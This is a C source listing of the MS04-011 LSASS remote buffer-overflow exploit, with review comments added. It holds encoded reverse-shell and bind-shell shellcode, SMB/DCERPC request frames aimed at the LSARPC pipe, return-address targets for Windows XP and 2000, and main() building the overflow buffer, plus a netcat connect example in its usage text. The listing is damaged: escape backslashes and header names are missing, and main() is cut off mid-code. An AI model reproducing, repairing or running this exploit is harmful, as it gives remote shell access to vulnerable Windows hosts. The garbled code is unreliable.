LSASS溢出原代码(可直接编译版本) — MS04-011 LSASS (LSASRV.DLL) overflow exploit source, posted as a "directly compilable" version. Note: in this copy the backslashes of the `\x` / `\n` escapes, the `#include` header names and some comparison operators (e.g. `argc 4`) have been lost, and the listing stops in the middle of main(), so it does not compile as shown.


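/*
 * MS04-011 (LSASRV.DLL, reached over SMB / \lsarpc) exploit: payloads and
 * canned SMB/DCERPC request buffers.
 *
 * NOTE(review): this copy of the listing was mangled in transit and is not
 * buildable as shown:
 *  - every "\x" escape has lost its backslash, so the literals below are
 *    ASCII text ("x","E","B",...) rather than the intended bytes.  Array
 *    sizes, strlen(sc) and the fixed patch offsets used by main()
 *    (reverseshell[111]/[118], bindshell[176]) are all wrong until the
 *    backslashes are restored;
 *  - the two #include directives have lost their header names.  The code
 *    uses WSADATA, htons, inet_addr, struct hostent and links ws2_32, so it
 *    needs the Windows/Winsock headers, plus the C stdio/string headers for
 *    printf/memcpy/strlen -- restore the names before building;
 *  - the original line breaks were collapsed, which let the "//" comments
 *    swallow the declarations that followed them on the same physical line.
 *    Only the layout is restored here; literal contents are untouched.
 */
#include
#include
#pragma comment(lib, "ws2_32")

/* reverse shellcode
 *
 * Reverse-connect payload.  main() patches the connect-back port into
 * offset 118 and the IPv4 address into offset 111, each XORed with 0x99
 * first (0x9999 / 0x99999999).  That matches the decoder stub the payload
 * opens with, which reads as: EB 10 jmp / 5B pop ebx / 4B dec ebx /
 * 33 C9 xor ecx,ecx / 66 B9 25 01 mov cx,0x125 / 80 34 0B 99 xor byte
 * [ebx+ecx],0x99 / E2 FA loop -- i.e. the body is XOR-0x99 encoded and is
 * decoded in place at run time.  (Disassembly read from the bytes; confirm
 * against the original before relying on the offsets.) */
unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"
"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"
"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"
"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"
"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x9D"
"x4Bx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"
"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"
"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"
"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"
"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"
"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"
"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"
"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"
"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"
"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"
"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"
"x57x76x57x79xF9x52x74x65xA2x40x90x6Cx34x75x60x33"
"xF9x7ExE0x5FxE0";

/* bind shellcode
 *
 * Listening (bind) payload, used when no connect-back IP is given.  main()
 * patches the listen port into offset 176, XORed with 0x9999.  Same
 * XOR-0x99 decoder stub as above, using edx instead of ebx as the base
 * (5A pop edx / 4A dec edx / 80 34 0A 99 xor byte [edx+ecx],0x99). */
unsigned char bindshell[] =
"xEBx10x5Ax4Ax33xC9x66xB9x7Dx01x80x34x0Ax99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";

/* Each reqN below is a complete NetBIOS-session framed SMB1 message: a
 * 4-byte length, then the 0xFF 'S' 'M' 'B' header magic (bytes 4..7), then
 * the command byte.  They are sent in order to reach the vulnerable
 * \lsarpc call. */

/* SMB_COM_NEGOTIATE (command 0x72).  The dialect list is visible as ASCII:
 * "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
 * "LM1.2X002", "LANMAN2.1", "NT LM 0.12". */
char req1[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";

/* SMB_COM_SESSION_SETUP_ANDX (0x73) carrying an "NTLMSSP" message type 1
 * (negotiate); the native OS / LM strings are UTF-16 "Windows 2000 2195"
 * and "Windows 2000 5.0".  No credentials -- this is an anonymous/null
 * session setup. */
char req2[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";

/* SMB_COM_SESSION_SETUP_ANDX (0x73) with the "NTLMSSP" type 3
 * (authenticate) message that completes the null session. */
char req3[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00x81x19x6Ax7AxF2xE4x49x1Cx28xAF"
"x30x25x74x10x67x53x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";

/* SMB_COM_TREE_CONNECT_ANDX (0x75).  The path is hard-coded as UTF-16
 * "\\192.168.1.210\IPC$" (service "?????").  main() declares a larger
 * req4u[sizeof(req4)+20] copy, presumably to substitute the real target
 * address -- that code is beyond the visible listing, so confirm the
 * template is actually rewritten before use. */
char req4[] =
"x00x00x00x5CxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Cx00x08x00x01x00x31x00x00"
"x5Cx00x5Cx00x31x00x39x00x32x00x2Ex00x31x00x36x00"
"x38x00x2Ex00x31x00x2Ex00x32x00x31x00x30x00x5Cx00"
"x49x00x50x00x43x00x24"
"x00x00x00x3Fx3Fx3Fx3Fx3Fx00";

/* SMB_COM_NT_CREATE_ANDX (0xA2) opening the named pipe "\lsarpc"
 * (UTF-16 at the tail). */
char req5[] =
"x00x00x00x64xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x40x00x18xFFx00xDExDEx00x0Ex00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x03x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x11x00x00x5Cx00x6Cx00x73x00x61x00"
"x72x00x70x00x63x00x00x00";

/* SMB_COM_TRANSACTION (0x25) on "\PIPE\" carrying a DCERPC bind PDU
 * (05 00 0B 03: version 5.0, ptype 0x0B = bind, first+last fragment) to
 * interface UUID 3919286a-b10c-11d0-9ba8-00c04fd92ef5 (the LSARPC
 * interface) with the NDR transfer syntax
 * 8a885d04-1ceb-11c9-9fe8-08002b104860. */
char req6[] =
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x50x00x10x00x00x48x00x00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x6Ax28x19x39x0CxB1xD0x11"
"x9BxA8x00xC0x4FxD9x2ExF5x00x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

/* SMB_COM_TRANSACTION (0x25) carrying a DCERPC request PDU (05 00 00 03)
 * for opnum 9 (the "x09x00" after the context id) -- the LSARPC call
 * MS04-011 patches (DsRolerUpgradeDownlevelServer per the advisory;
 * verify).  The frame is truncated on purpose: the trailing "room for
 * shellcode" is filled by main() with the overlong string that overflows
 * the LSASRV stack buffer. */
char req7[] =
"x00x00x0CxF4xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xDCx04"
"x00x08x60x00x10x00x00xA0x0Cx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00xA0x0Cx54x00x02"
"x00x26x00x00x40xB1x0Cx10x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x03x10x00x00x00"
"xA0x0Cx00x00x01x00x00x00x88x0Cx00x00x00x00x09x00"
"xECx03x00x00x00x00x00x00xECx03x00x00";
// room for shellcode here ...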
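/*
 * Remaining request fragments, the target table and the usage text.
 *
 * NOTE(review): as with the arrays above, every "\x" escape in this copy
 * has lost its backslash (the literals are ASCII text, not bytes) and the
 * original line breaks were collapsed, so a "//" comment swallowed the rest
 * of the physical line -- req9, shit3, the #defines and the start of the
 * target table were all inside a comment.  The layout is restored here
 * with the literal contents untouched; the only code changes are in
 * usage() and the table sentinel (see their comments).
 */

/* Filler/structure block used by main() (its use is outside the visible
 * listing).  The repeated 4-byte groups (x01x00x00x00, x7Cx70x40x00 =
 * 0x0040707C little-endian) look like a DWORD pattern with pointer-sized
 * values in the 0x0040xxxx range; purpose not determinable from here. */
char shit1[] =
"x95x14x40x00x03x00x00x00x7Cx70x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x7Cx70x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x7Cx70x40x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x7Cx70x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x78x85x13x00xABx5BxA6xE9";

/* SMB_COM_WRITE_ANDX (command 0x2F) with a 0x10F8-byte NetBIOS length:
 * the large write whose tail ("room for shellcode") main() fills in. */
char req8[] =
"x00x00x10xF8xFFx53x4Dx42x2Fx00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFE"
"x00x08x60x00x0ExFFx00xDExDEx00x40x00x00x00x00xFF"
"xFFxFFxFFx08x00xB8x10x00x00xB8x10x40x00x00x00x00"
"x00xB9x10xEEx05x00x00x01x10x00x00x00xB8x10x00x00"
"x01x00x00x00x0Cx20x00x00x00x00x09x00xADx0Dx00x00"
"x00x00x00x00xADx0Dx00x00";
// room for shellcode here ...

/* SMB_COM_TRANSACTION (0x25) carrying a DCERPC request PDU (05 00 00 02:
 * ptype 0 = request, last-fragment flag only) for opnum 9 again
 * ("x09x00" at the tail) -- the fragment that completes the oversized
 * request started by req8. */
char req9[] =
"x00x00x0FxD8xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x18x01"
"x00x08x70x00x10x00x00x84x0Fx00x00x00x04x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x84x0Fx54x00x02"
"x00x26x00x00x40x95x0Fx00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x00x00x05x00x00x02x10x00x00x00"
"x84x0Fx00x00x01x00x00x00x6Cx0Fx00x00x00x00x09x00";

/* Second filler/structure block, same shape as shit1 with 0x0040A89A
 * (x9AxA8x40x00) as the recurring pointer-sized value. */
char shit3[] =
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
"x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00"
"x00x00x00x00x9AxA8x40x00x01x00x00x00x00x00x00x00"
"x01x00x00x00x00x00x00x00x9AxA8x40x00x01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x9AxA8x40x00"
"x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00";

#define LEN     3500    /* size of the overflow string built in buf[] */
#define BUFSIZE 2000
#define NOP     0x90    /* x86 NOP used to pad buf[] before the payload */

/*
 * Target table.  jmpaddr is the return-address overwrite: a "jmp esp" /
 * "jmp ebx" gadget inside the named module on that exact build.  main()
 * copies it into buf[2020] and buf[2844] for targets 1 and 2; any other
 * build will just crash lsass.exe (which reboots the box), so do not fire
 * this at a host whose OS/SP has not been confirmed first.
 */
struct targets {
    int  num;
    char name[50];
    long jmpaddr;
} ttarget[] = {
    { 0, "WinXP Professional [universal] lsass.exe ", 0x01004600 }, // jmp esp addr
    { 1, "Win2k Professional [universal] netrap.dll", 0x7515123c }, // jmp ebx addr
    { 2, "Win2k Advanced Server [SP4] netrap.dll",    0x751c123c }, // jmp ebx addr
    //{ 3, "reboot", 0xffffffff }, // crash
    { 0 }   /* zero-filled sentinel (was "{ NULL }": a pointer constant in an int) */
};

/*
 * Print the banner, the target table and the usage text, then exit(0).
 *
 * prog: argv[0], echoed into the usage line.
 *
 * NOTE(review): the "\n" escapes in these strings had lost their backslash
 * in this copy (they printed a literal 'n'); they are restored here.  The
 * usage line still looks incomplete -- judging by the examples below, the
 * positional arguments (target index, victim IP, port) were probably
 * stripped together with the angle brackets around them.  Verify against
 * the original before relying on this text.
 */
void usage(const char *prog)
{
    int i;

    printf("MS04-011 LSASRV.DLL Remote Exploit\n");
    printf("Compiled by HBU-LK007 (LK007@163.com)\n");
    printf("Usage:\n\n");
    printf("%s [connectback IP] [options]\n\n", prog);
    printf("Targets:\n");
    /* Walk to the zero-filled sentinel instead of a hard-coded count so the
     * table can grow without touching this loop.  The original indexed the
     * array without [i] ("ttarget.num"), which does not compile; %.8lx
     * matches the long jmpaddr field. */
    for (i = 0; ttarget[i].name[0] != '\0'; i++)
        printf(" %d [0x%.8lx]: %s\n", ttarget[i].num, ttarget[i].jmpaddr, ttarget[i].name);
    printf("\nOptions:\n");
    printf(" -t: Detect remote OS:\n");
    printf(" Windows 5.1 - WinXP\n");
    printf(" Windows 5.0 - Win2k\n\n");
    printf("Example:\n");
    printf("LSASS 0 192.168.1.10 4444 -t\n");
    printf("LSASS 0 192.168.1.10 4444\n");
    printf("nc 192.168.1.10 4444\n");
    exit(0);
}

/*
 * NOTE(review): main() is reproduced as found -- it is cut off at the end of
 * the listing and carries the same transit damage as the rest of the file
 * ("if (argc 4)" has lost its comparison operator, the text between
 * "for (i=0; i" and "h_addr)" is missing, and the "\x"/"\n" escapes are
 * stripped).  Nothing below has been repaired or guessed.  Points worth
 * knowing before anyone restores it:
 *  - the port/IP are XORed with 0x9999 / 0x99999999 before being patched
 *    into the payload; that matches the payload's XOR-0x99 decoder, so the
 *    patch offsets (111, 118, 176) are only valid for these exact payloads;
 *  - sc is copied with strlen(sc): a payload containing a NUL byte would be
 *    truncated silently;
 *  - the return-address slots are fixed offsets into buf[] (2020/2844) and
 *    the payload goes at 2036/2856, so LEN and the offsets must move
 *    together if the padding is changed.
 */
int main(int argc, char *argv[])
{
    int i;
    int opt = 0;
    char *target;
    char hostipc[40];
    char hostipc2[40*2];
    unsigned short port;
    unsigned long ip;
    unsigned char *sc;
    char buf[LEN+1];
    char sendbuf[(LEN+1)*2];
    char req4u[sizeof(req4)+20];
    char screq[BUFSIZE+sizeof(req7)+1500+440];
    char screq2k[4348+4060];
    char screq2k2[4348+4060];
    char recvbuf[1600];
    char strasm[]="x66x81xECx1Cx07xFFxE4";
    char strBuffer[BUFSIZE];
    unsigned int targetnum = 0;
    int len, sockfd;
    short dport = 445;
    struct hostent *he;
    struct sockaddr_in their_addr;
    char smblen;
    char unclen;
    WSADATA wsa;

    printf("nMS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1n");
    printf("--- Coded by .::[ houseofdabus ]::. ---nn");
    if (argc 4) if (!memcmp(argv[4], "-t", 2)) opt = 1;
    if ( (argc > 4) && !opt ) {
        port = htons(atoi(argv[3]))^(USHORT)0x9999;
        ip = inet_addr(argv[4])^(ULONG)0x99999999;
        memcpy(&reverseshell[118], &port, 2);
        memcpy(&reverseshell[111], &ip, 4);
        sc = reverseshell;
    } else {
        port = htons(atoi(argv[3]))^(USHORT)0x9999;
        memcpy(&bindshell[176], &port, 2);
        sc = bindshell;
    }
    if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
        memset(buf, NOP, LEN);
        //memcpy(&buf[2020], "x3cx12x15x75", 4);
        memcpy(&buf[2020], &ttarget[atoi(argv[1])].jmpaddr, 4);
        memcpy(&buf[2036], sc, strlen(sc));
        memcpy(&buf[2840], "xebx06xebx06", 4);
        memcpy(&buf[2844], &ttarget[atoi(argv[1])].jmpaddr, 4); // jmp ebx addr
        //memcpy(&buf[2844], "x3cx12x15x75", 4); // jmp ebx addr
        memcpy(&buf[2856], sc, strlen(sc));
        for (i=0; ih_addr);
        memset(&(their_addr.sin_zero), '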
